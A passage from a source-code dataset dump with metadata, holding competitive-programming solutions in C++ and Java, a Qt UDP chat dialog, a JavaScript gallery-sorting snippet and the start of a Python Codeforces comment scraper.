y1, \n c = z2 - z1, \n d = x3 - x1, \n e = y3 - y1, \n f = z3 - z1,\n nx = b * f - c * e,\n ny = c * d - a * f,\n nz = a * e - b * d,\n nn = nx * nx + ny * ny + nz * nz,\n D = -(nx * x1 + ny * y1 + nz * z1),\n coef *= nn,\n temp.a ={{-2 * nx * nx + nn, -2 * nx * ny, -2 * nx * nz, 0 }, \n {-2 * ny * nx, -2 * ny * ny + nn, -2 * ny * nz, 0 }, \n {-2 * nz * nx, -2 * nz * ny, -2 * nz * nz + nn, 0 }, \n {-2 * nx * D , -2 * ny * D , -2 * nz * D , nn}},\n mtrx *= temp;\n readln(n);\n vector<int> v(4);\n double x, y, z;\n fori(n)\n readln(v[0], v[1], v[2]),\n v[3] = 1,\n v = v * mtrx,\n x = v[0],\n y = v[1],\n z = v[2],\n writeln(x / coef, y / coef, z / coef);\n}\n\nint main()\n{\n freopen(FILENAME\".in\", \"r\", stdin);\n freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nvoid print(double a){printf(\" \" DOUBLEFORMAT,a);}\nvoid print(int a){printf(\" %d\",a);}\nvoid print(string a){printf(\" %s\",a.c_str());}\nvoid print(long long a){printf(\" %lld\",a);}\nvoid print(unsigned long a){printf(\" %ld\",a);}\nvoid print(unsigned int a){printf(\" %d\",a);}\nvoid print(char a){printf(\" %c\",a);}\nvoid print_no_space(double a){printf(DOUBLEFORMAT, a);}\nvoid print_no_space(int a){printf(\"%d\", a);}\nvoid print_no_space(string a){printf(\"%s\", a.c_str());}\nvoid print_no_space(long long a){printf(\"%lld\", a);}\nvoid print_no_space(unsigned long a){printf(\"%ld\", a);}\nvoid print_no_space(unsigned int a){printf(\"%d\", a);}\nvoid print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a);\ntemplate<class Type>\nvoid print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print(pair<Type1, Type2>& a){print(a.first);print(a.second);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print_no_space(pair<Type1, Type2>&a){print_no_space(a.first);print(a.second);}\ntemplate <class Head, class... Tail>\nvoid writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail>\nvoid writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\nvoid read(double &a){scanf(\"%lf\",&a);}\nvoid read(int &a){scanf(\"%d\",&a);}\nvoid read(string &a){cin>>a;}\nvoid read(long long &a){scanf(\"%lld\",&a);}\nvoid read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2>\nvoid read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type>\nvoid read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail>\nvoid readln(Head& head,Tail&... tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.30792036652565, "alphanum_fraction": 0.31702667474746704, "avg_line_length": 22.22051239013672, "blob_id": "40b3ada2706e170067aca7ae8a935407fc6a4ec1", "content_id": "7533d0f390edf5e6a290fd241ec42f58f3559fa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6614, "license_type": "no_license", "max_line_length": 78, "num_lines": 195, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/H.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\n \r\npublic class H {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n \r\n    class Node {\r\n        int b = 1, w = 0;\r\n        int f, t;\r\n        Node l, r;\r\n \r\n        int color = 0;\r\n \r\n        Node(int i) {\r\n            f = t = i;\r\n        }\r\n \r\n        Node(Node l, Node r) {\r\n            this.l = l;\r\n            this.r = r;\r\n            f = l.f;\r\n            t = r.t;\r\n            w = l.w + r.w;\r\n            b = l.b + r.b;\r\n        }\r\n \r\n        int get(int i) {\r\n            if (i < f || t < i) {\r\n                return -1;\r\n            }\r\n \r\n            if (color != -1) {\r\n                return color;\r\n            }\r\n \r\n            return Math.max(l.get(i), r.get(i));\r\n        }\r\n \r\n        void paint(int from, int to, boolean c) {\r\n            if (to < from || t < from || to < f) {\r\n                return;\r\n            }\r\n \r\n            if (from <= f && t <= to) {\r\n                if (c) {\r\n                    color = 1;\r\n                    w = t - f + 1;\r\n                    b = 0;\r\n                } else {\r\n                    b = t - f + 1;\r\n                    w = 0;\r\n                    color = 0;\r\n                }\r\n                return;\r\n            }\r\n \r\n            if (color != -1) {\r\n                l.paint(f, t, color == 1);\r\n                r.paint(f, t, color == 1);\r\n                color = -1;\r\n            }\r\n \r\n            l.paint(from, to, c);\r\n            r.paint(from, to, c);\r\n \r\n            w = l.w + r.w;\r\n            b = l.b + r.b;\r\n        }\r\n \r\n    }\r\n \r\n    public void solve() {\r\n        int m = 1_000_000;\r\n \r\n        Node[] tree = new Node[m];\r\n        for (int i = 0; i < m; i++) {\r\n            tree[i] = new Node(i);\r\n        }\r\n \r\n        while (m > 1) {\r\n            int k = 0;\r\n            for (int i = 1; i < m; i += 2) {\r\n                tree[k++] = new Node(tree[i - 1], tree[i]);\r\n            }\r\n            if (m % 2 == 1) {\r\n                tree[k++] = tree[m - 1];\r\n            }\r\n            m = k;\r\n        }\r\n        Node root = tree[0];\r\n        int n = in.nextInt();\r\n \r\n        while (--n >= 0) {\r\n            int q = in.nextInt();\r\n            if (q == 1) {\r\n                int l = in.nextInt() - 1, r = in.nextInt() - 1;\r\n                int c = in.nextInt();\r\n                root.paint(l, r, c == 1);\r\n            } else if (q == 2) {\r\n                int i = in.nextInt() - 1;\r\n \r\n                if (root.get(i) == 0) {\r\n                    out.println(\"WHITE\");\r\n                } else {\r\n                    out.println(\"BLACK\");\r\n                }\r\n            } else {\r\n \r\n                int c = in.nextInt();\r\n \r\n                if (c == 0) {\r\n                    out.println(root.b);\r\n                } else if (c == 1) {\r\n                    out.println(root.w);\r\n                } else {\r\n                    out.println(0);\r\n                }\r\n \r\n            }\r\n        }\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new H().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.5331636071205139, "alphanum_fraction": 0.5432208776473999, "avg_line_length": 27.08888816833496, "blob_id": "cfc6744219ea1f7fd4a0810ea2a2f86220e6b4e6", "content_id": "9b4fa0ae4e04af2793a4270efbf0f79237fccf9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7936, "license_type": "no_license", "max_line_length": 108, "num_lines": 270, "path": "/study/ChatNotDemo/chatdialog.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": " #include <QtGui>\r\n #include <cstdio>\r\n #include <string>\r\n #include <QUdpSocket>\r\n #include <ctime>\r\n #include <QNetworkInterface>\r\n\r\n #include \"chatdialog.h\"\r\n\r\n using namespace std;\r\n\r\n int getUniqeNick()\r\n {\r\n FILE *f;\r\n f = fopen(\"nick.txt\", \"r\");\r\n int i = 0;\r\n if (f != NULL)\r\n {\r\n fscanf(f, \"%d\", &i);\r\n fclose(f);\r\n }\r\n f = fopen(\"nick.txt\",\"w+\");\r\n fprintf(f, \"%d\", ++i);\r\n fclose(f);\r\n return i - 1;\r\n }\r\n\r\n void ChatDialog::getTime(time_t timer, char s[])\r\n {\r\n struct tm *t;\r\n time (&timer);\r\n t = localtime(&timer);\r\n sprintf(s, \"%d.%d %d:%d:%d\", t->tm_mday, t->tm_mon + 1, t->tm_hour, t->tm_min, t->tm_sec);\r\n }\r\n\r\n void ChatDialog::logMessage(const QString &nick, const QString &message)\r\n {\r\n QByteArray s1 = nick.toUtf8();\r\n const char *printedString1 = s1.data();\r\n QByteArray s2 = message.toUtf8();\r\n const char *printedString2 = s2.data();\r\n ::printf(\"#%d %s %s#\\n\", time(NULL), printedString1, printedString2);\r\n }\r\n\r\n QUdpSocket *udpSocket = new QUdpSocket(0);\r\n\r\n void ChatDialog::showHistory()\r\n {\r\n //QTextCodec::setCodecForCStrings(QTextCodec::codecForName(\"UTF8\"));\r\n freopen(\"history.tmp\", \"r\", stdin);\r\n char c;\r\n string s;\r\n time_t timer;\r\n while (true)\r\n {\r\n scanf(\"%c\", &c);\r\n if (c != '#')\r\n break;\r\n s = c;\r\n scanf(\"%d \", &timer);\r\n while(true)\r\n {\r\n scanf(\"%c\", &c);\r\n if (c == '#')\r\n break;\r\n s.push_back(c);\r\n }\r\n scanf(\"%c\\n\", &c);\r\n s.erase(0, 1);\r\n QString qstr(s.c_str());\r\n QTextCursor cursor(textEdit->textCursor());\r\n cursor.movePosition(QTextCursor::End);\r\n QColor color = textEdit->textColor();\r\n if (s[s.size() - 1] == 'd')\r\n textEdit->setTextColor(Qt::blue); else\r\n if (s[s.size() - 1] == 't')\r\n textEdit->setTextColor(Qt::gray);\r\n textEdit->append(tr(\"%1\").arg(qstr));\r\n textEdit->setTextColor(color);\r\n QScrollBar *bar = textEdit->verticalScrollBar();\r\n bar->setValue(bar->maximum());\r\n }\r\n fclose(stdin);\r\n }\r\n\r\n QString ChatDialog::localIP(int i)\r\n {\r\n QString locIP;\r\n QList<QHostAddress> addr = QNetworkInterface::allAddresses();\r\n locIP = addr.at(i).toString();\r\n return locIP;\r\n }\r\n\r\n ChatDialog::ChatDialog(QWidget *parent)\r\n : QDialog(parent)\r\n {\r\n setupUi(this);\r\n udpSocket->bind(3838, QUdpSocket::ShareAddress);\r\n lineEdit->setFocusPolicy(Qt::StrongFocus);\r\n textEdit->setFocusPolicy(Qt::NoFocus);\r\n textEdit->setReadOnly(true);\r\n listWidget->setFocusPolicy(Qt::NoFocus);\r\n connect(udpSocket, SIGNAL(readyRead()), this, SLOT(getMsg()));\r\n int i = getUniqeNick() + '0';\r\n myNickName = \"igorjan\";\r\n myNickName.append(i);\r\n tableFormat.setBorder(0);\r\n freopen(\"history.tmp\", \"a+\", stdout);\r\n showHistory();\r\n sendMsg(\"HELLO\", myNickName);\r\n }\r\n\r\n void ChatDialog::sendMsg(QString nick, QString msg)\r\n {\r\n if (msg != \"\")\r\n {\r\n QByteArray datagram;\r\n datagram.append(nick + ' ' + msg);\r\n udpSocket->writeDatagram(datagram.data(), datagram.size(), QHostAddress::Broadcast, 3838);\r\n msg = \"\";\r\n }\r\n }\r\n\r\n void ChatDialog::appendMessage(const QString &from, const QString &message)\r\n {\r\n if (from.isEmpty() || message.isEmpty())\r\n return;\r\n QTextCursor cursor(textEdit->textCursor());\r\n cursor.movePosition(QTextCursor::End);\r\n textEdit->append(tr(\"%1\").arg('<' + from + \"> \" + message));\r\n QScrollBar *bar = textEdit->verticalScrollBar();\r\n bar->setValue(bar->maximum());\r\n logMessage(\"<\" + from + \">\", message);\r\n }\r\n\r\n void ChatDialog::returnPressed()\r\n {\r\n QString text = lineEdit->text();\r\n if (text.isEmpty())\r\n return;\r\n sendMsg(\"MESSAGE\" + myNickName, text);\r\n lineEdit->clear();\r\n }\r\n\r\n QString ChatDialog::getUserList()\r\n {\r\n QString s;\r\n QList<QListWidgetItem*> items = listWidget->findItems(QString(\"*\"), Qt::MatchWrap | Qt::MatchWildcard);\r\n for (int i = 0; i < items.size(); i++)\r\n s.append(items.at(i)->text()),\r\n i == items.size() - 1 ? s.append('\\n') : s.append(' ');\r\n return s;\r\n }\r\n\r\n void ChatDialog::getMsg()\r\n {\r\n QByteArray datagram;\r\n datagram.resize(udpSocket->pendingDatagramSize());\r\n QHostAddress sender;\r\n quint16 senderPort;\r\n udpSocket->readDatagram(datagram.data(), datagram.size(), &sender, &senderPort);\r\n QString text = QString(datagram.data());\r\n QString nick = \"\";\r\n {\r\n if (text[0] == 'H')\r\n {\r\n text.remove(0, 6);\r\n newParticipant(text);\r\n// logMessage(myNickName + \"oooooo! \", s);\r\n }\r\n if (text[0] == 'Q')\r\n {\r\n text.remove(0, 5);\r\n participantLeft(text);\r\n }\r\n if (text[0] == 'M')\r\n {\r\n text.remove(0, 7);\r\n int i = 0;\r\n while (text[i] != ' ')\r\n nick += text[i],\r\n i++;\r\n text.remove(0, i + 1);\r\n //get time from string\r\n appendMessage(nick, text);\r\n }\r\n }\r\n }\r\n\r\n void ChatDialog::clearHistory()\r\n {\r\n QMessageBox msgBox;\r\n msgBox.setIcon(QMessageBox::Critical);\r\n QString str = \"Вы уверены, что хотите очистить всю историю сообщений?\";\r\n msgBox.setText(tr(\"%1\").arg(str));\r\n msgBox.setStandardButtons(QMessageBox::Yes | QMessageBox::No);\r\n if(msgBox.exec() == 16384)\r\n freopen(\"history.tmp\", \"w+\", stdout);\r\n }\r\n\r\n void ChatDialog::printf(QColor color, QString nick, QString did)\r\n {\r\n QColor curColor = textEdit->textColor();\r\n textEdit->setTextColor(color);\r\n textEdit->append(tr(\"* %1 has %2\").arg(nick, did));\r\n textEdit->setTextColor(curColor);\r\n QScrollBar *bar = textEdit->verticalScrollBar();\r\n bar->setValue(bar->maximum());\r\n logMessage(\"* \" + nick, \"has \" + did);\r\n }\r\n\r\n void ChatDialog::newParticipant(const QString &nick)\r\n {\r\n if (nick.isEmpty())\r\n return;\r\n printf(Qt::red, nick, \"joined\");\r\n listWidget->addItem(nick);\r\n }\r\n\r\n void ChatDialog::participantLeft(const QString &nick)\r\n {\r\n if (nick.isEmpty())\r\n return;\r\n QList<QListWidgetItem *> items = listWidget->findItems(nick, Qt::MatchExactly);\r\n if (items.isEmpty())\r\n return;\r\n delete items.at(0);\r\n printf(Qt::gray, nick, \"left\");\r\n }\r\n\r\n ChatDialog::~ChatDialog()\r\n {\r\n sendMsg(\"QUIT\", myNickName);\r\n logMessage(\"* \" + myNickName, \"has left\");\r\n //тут должно быть закрытие файла, по хорошему\r\n }\r\n /*void Receiver::run() {\r\n QUdpSocket *udpSocket = new QUdpSocket(0);\r\n udpSocket->bind(3838, QUdpSocket::ShareAddress);\r\n while (udpSocket->waitForReadyRead(-1)) {\r\n if (udpSocket->hasPendingDatagrams()) {\r\n QByteArray datagram;\r\n datagram.resize(udpSocket->pendingDatagramSize());\r\n QHostAddress sender;\r\n quint16 senderPort;\r\n udpSocket->readDatagram(datagram.data(), datagram.size(), &sender, &senderPort);\r\n QString text = QString(datagram.data());\r\n m1.lock();\r\n label->append(tr(\"%1\").arg(text));\r\n m1.unlock();\r\n }\r\n }\r\n}\r\n\r\nvoid Broadcaster::run() {\r\n QHostAddress a(QUdpSocket::ShareAddress);\r\n while (1) {\r\n m2.lock();\r\n if (mes != \"\") {\r\n QByteArray datagram;\r\n datagram.append(mes);\r\n QUdpSocket *udpSocket = new QUdpSocket(0);\r\n udpSocket->bind(3838, QUdpSocket::ShareAddress);\r\n udpSocket->writeDatagram(datagram.data(), datagram.size(), QHostAddress::Broadcast, 3838);\r\n mes = \"\";\r\n }\r\n m2.unlock();\r\n }\r\n}\r\n*/\r\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5868405699729919, "avg_line_length": 53.32258224487305, "blob_id": "fdf48b8843b407ce9b3140687a6fd5ba5469f195", "content_id": "7f960eb0db8e83b2508cd4739e97e9d3facb9114", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1687, "license_type": "no_license", "max_line_length": 391, "num_lines": 31, "path": "/scripts/gs.js", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n(async () => {\n $('.gs-gallery__image__info').css('bottom', '52px');\n let photos = [];\n let filter = $('.gs-gallery__filter__active');\n let order = filter[0].children[0].innerText.toLowerCase();\n photos.push(...(await angular.element(filter).controller().metaData.PagesManager.api.photos.save({action: 'get_photos_public'}, {get_achievements: true, get_liked: true, get_likes: true, get_member: true, get_votes: true, limit: 80, member_id: angular.element(filter).controller().$rootScope.el_id, order, sort: 'desc', start: 0, type: 'photos', search: $('#input-0')[0].value})).items);\n photos.map(photo => {\n let j = $(`a[ng-href=\"/photo/${photo.id}\"]`);\n if (j && j.length) j = j[0].parentNode;\n if (j) j = j.parentNode;\n if (j) j = j.children;\n if (j && j.length) j = j[1];\n if (j && j.children && j.children.length >= 2) {\n j.appendChild(j.children[1].cloneNode(true));\n let child = j.lastChild.children[1];\n if (child)\n child.innerText = (photo.votes / photo.views).toFixed(1);\n }\n });\n const get = a => +a.children[1].lastChild.innerText;\n const list = $('.gs-gallery__grid')[0];\n list.children[0].remove();\n list.parentElement.insertBefore(list.cloneNode(), list.parentElement.firstChild);\n Array.prototype.slice.call(list.children).slice(0, 70)\n .sort((a, b) => get(a) - get(b))\n .map(x => list.parentNode.firstChild.appendChild(x.children[2]));\n .map(x => {\n x.chilren[2].insertBefore(x.children[1], x.children[2].firstChild);\n list.parentNode.firstChild.appendChild(x.children[2]);\n });\n})();\n\n\n" }, { "alpha_fraction": 0.41277846693992615, "alphanum_fraction": 0.4140395224094391, "avg_line_length": 22.285715103149414, "blob_id": "1414417978ce092db55af40b3eae7c5ee0bccec9", "content_id": "34658ddf457fe188887af30f04f68eddf47e4de3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3158, "license_type": "no_license", "max_line_length": 78, "num_lines": 98, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\nimport java.math.BigInteger;\r\n \r\nimport static java.lang.Math.*;\r\n \r\npublic class C {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n    final static Random rnd = new Random();\r\n \r\n    public void solve() {\r\n        char[] str = in.next().toLowerCase().toCharArray();\r\n        char[] p = { 'p', 'e', 'r' };\r\n        int n = str.length;\r\n        int ans = 0;\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            if (str[i] != p[i % 3]) {\r\n                ++ans;\r\n            }\r\n        }\r\n \r\n        out.println(ans);\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new C().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.4027603566646576, "alphanum_fraction": 0.4316185712814331, "avg_line_length": 21.13888931274414, "blob_id": "cbca34dfb85b02db98b124b3b5d4e2695196e9c6", "content_id": "55d83b8f39c4ebb29559a57539c21ae2702ed665", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 797, "license_type": "no_license", "max_line_length": 61, "num_lines": 36, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.30/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdio>\n#include <vector>\n \nusing namespace std;\n \nint n;\n \nvector <pair<int, int> > ans;\n \nint main() {\n freopen(\"beautifulgraph.in\", \"r\", stdin);\n freopen(\"beautifulgraph.out\", \"w\", stdout);\n cin >> n;\n if (n == 1){\n cout << \"1 0\";\n return 0;\n }\n if (n == 4){\n cout << \"4 4\" << endl;\n cout << \"1 2\" << endl;\n cout << \"2 3\" << endl;\n cout << \"3 4\" << endl;\n cout << \"4 1\" << endl;\n return 0;\n }\n if (n <= 3)\n ans.push_back({1, 2});\n for (int i = 3; i <= n; ++i){\n ans.push_back({1, i});\n ans.push_back({2, i});\n }\n cout << n << \" \" << ans.size() << endl;\n for (int i = 0; i < ans.size(); ++i)\n cout << ans[i].first << \" \" << ans[i].second << endl;\n}\n" }, { "alpha_fraction": 0.4038461446762085, "alphanum_fraction": 0.42851170897483826, "avg_line_length": 34.17647171020508, "blob_id": "e102ca5dca5f5414f54cf707f3f4231672a4f1d8", "content_id": "a5e2003bcb92e60ef81bc6e6c9738b787d23f359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2392, "license_type": "no_license", "max_line_length": 928, "num_lines": 68, "path": "/2013/2013RCC1/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n// freopen(\"input.txt\", \"r\", stdin);\n a.resize(6);\n while (true)\n {\n int c = 0;\n int s = 0;\n for (int i = 0; i < 6; i++)\n scanf(\"%d\", &a[i]),\n a[i] == 0 ? c++ : c += 0;\n if (c == 6)\n break;\n for (int i = 0; i < 6; i += 2)\n if (a[i] > a[i + 1])\n swap(a[i], a[i + 1]);\n int mx = -1, j;\n for (int i = 0; i < 6; i += 2)\n if (a[i] > mx)\n mx = a[i],\n j = i;\n s = s + a[j] * a[j + 1];\n swap(a[j], a[0]);\n swap(a[j + 1], a[1]);\n s = s + a[2] * a[3];\n s = s + a[4] * a[5];\n if (a[2] < a[4])\n swap(a[2], a[4]),\n swap(a[3], a[5]);\n //printf(\"%I64d\\n\", s);\n\n s = s - min(a[0], a[2]) * min(a[1], a[3]);\n s = s - max(min(a[0], a[4]) * min(a[1], a[5])\n ,min(a[4], a[2]) * min(a[3], a[5]));\n printf(\"%d\\n\", s);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5566926002502441, "alphanum_fraction": 0.5658002495765686, "avg_line_length": 30.727272033691406, "blob_id": "6aa9bef14b61f341f2369e3e0789b77135dc08f2", "content_id": "3fe2f72cdbb37e036c4ebdfc6f10fba7d977060f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9885, "license_type": "no_license", "max_line_length": 117, "num_lines": 308, "path": "/CodeForce/codeforcesComments.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\nimport threading\nfrom time import sleep\nfrom html.parser import HTMLParser\nimport multiprocessing\nfrom multiprocessing import Manager\nimport cherrypy_cors\nimport cherrypy\nimport json\nimport sys\n\nmanager = Manager()\ncomments = manager.dict()\nusers = manager.dict()\nblogs = manager.dict()\nusersToServer = manager.list()\ncommentsToServer = manager.list()\nblogsToServer = manager.list()\nSLEEP_RECENT = 60 * 30\nSLEEP_BIG_UPDATE = 3600 * 40\nCOUNT_COMMENTS_TO_WATCH = 50\nMIN_RATING_TO_WATCH = 100\nMIN_BLOG_TO_WATCH = 20\npath = '/home/igorjan/206round/CodeForce'\nport = 2929\nhost = \"192.168.2.6\"\n\n# {{{\nclass CodeForcesRecentActionsParser(HTMLParser):\n\n def __init__(self):\n HTMLParser.__init__(self)\n self.recentActions = False\n self.li = False\n self.recent = set()\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div':\n if attrs == [('class', 'recent-actions')]:\n self.recentActions = True\n elif tag == 'li':\n self.li = True\n elif tag == 'a' and self.recentActions and self.li and len(attrs) == 1:\n (x, y) = attrs[0]\n self.recent.add(y.rsplit('/', 2)[-1])\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.recentActions and not self.li:\n self.recentActions = False\n if tag == 'li' and self.recentActions:\n self.li = False\n\nclass CodeForcesBlogParser(HTMLParser):\n\n def __init__(self, blogId):\n HTMLParser.__init__(self)\n self.avatar = False\n self.user = ''\n self.blogId = blogId\n self.postRating = False\n self.author = ''\n self.getAuthor = False\n self.blogRating = 0\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div':\n if attrs == [('class', 'avatar')]:\n self.avatar = True\n if attrs == [('class', 'right-meta')]:\n self.getAuthor = True\n if tag == 'a' and self.avatar:\n (_, self.user) = attrs[0]\n self.avatar = False\n if tag == 'a' and self.getAuthor:\n (_, self.author) = attrs[0]\n blogs[self.blogId] = (self.blogRating, self.author.rsplit('/', 2)[-1])\n self.getAuthor = False\n if tag == 'span':\n if len(attrs) >= 3:\n x, commentId = attrs[0]\n if x == 'commentid':\n index = 1\n if len(attrs) == 4:\n index += 1\n _, count = attrs[index]\n name = self.user.rsplit('/', 2)[-1]\n count = int(count)\n if abs(count) >= COUNT_COMMENTS_TO_WATCH: # HERE\n comments[commentId] = (name, int(count), self.blogId)\n if name in users:\n users[name] += count\n else:\n users[name] = count\n elif len(attrs) >= 2:\n x, title = attrs[0]\n if x == 'title' and title == \"Рейтинг текста\":\n self.postRating = True\n\n def handle_data(self, data):\n if self.postRating:\n self.blogRating = int(data)\n self.postRating = False\n# }}}\n\ndef proceedArray(x, **kwargs):\n if not 'from' in kwargs:\n fromIndex = 0\n else:\n fromIndex = int(kwargs['from'])\n if not 'count' in kwargs:\n toIndex = fromIndex + 10\n else:\n toIndex = fromIndex + int(kwargs['count'])\n if 'reversed' in kwargs:\n x2 = list(reversed(x))\n else:\n x2 = x\n if 'username' in kwargs:\n x2 = list(filter(lambda x: kwargs['username'] in x['username'], x2))\n length = len(x2)\n toIndex = min(toIndex, length)\n\n return json.dumps({'length': length, 'data': x2[fromIndex:toIndex]})\n\nclass CodeForcesServer(object):\n\n @cherrypy.expose\n def default(self, *args, **kwargs):\n try:\n x, y = args\n if x == 'js' or x == 'css' or 